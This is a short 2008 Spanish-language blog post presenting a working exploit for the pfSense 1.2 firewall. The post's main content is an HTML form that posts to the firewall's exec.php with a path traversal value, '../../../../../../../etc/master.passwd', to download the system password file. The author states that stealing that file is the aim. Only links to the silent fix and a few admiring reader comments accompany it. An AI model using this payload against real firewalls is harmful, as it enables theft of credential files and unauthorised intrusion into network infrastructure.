nonr00t'S stuff (uid != 0): Bug and exploit for Pfsense v1.2

jueves, 7 de agosto de 2008

Bug and exploit for Pfsense v1.2

Por donde atacarias un firewall?

Un exploit?
bash-3.2# cat ataque.html


<form name="ataque" method="post" action="http://192.168.20.200/exec.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Ataque</td>
<td><input name="submit" type="text" id="victima" value="Download"></td>
<td><input name="dlPath" type="text" id="victima2" value="../../../../../../../etc/master.passwd"></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" name="submit" value="Download"></td>
</tr>
</table>
</form>

Donde, 192.168.20.200 es ?

Yo solo quiero descargarme el /etc/master.passwd del firewall.

(thx astrid por la inspiración, jeje)

Un fix silencioso ...

de:
http://cvstrac.pfsense.org/fileview?f=pfSense/usr/local/www/exec.php&v=1.10.4.11.2.1

a:
http://cvstrac.pfsense.org/fileview?f=pfSense/usr/local/www/exec.php&v=1.10.4.13

bye ...

3 comentarios:

Astrid dijo...: :)
Another masterpiece :*; jueves, agosto 07, 2008
Anónimo dijo...: nice nice very nice ...; viernes, agosto 08, 2008
Claudia Peña dijo...: master of your inspiration?

:P; viernes, agosto 15, 2008

Publicar un comentario

nonr00t'S stuff (uid != 0)

jueves, 7 de agosto de 2008

Bug and exploit for Pfsense v1.2

3 comentarios:

Entradas populares

#show vlans

#show tags --format cloud

#ls -la /tags

#ls -la /dates

#who am i

!OpenBSD COLOMBIA¡

Translate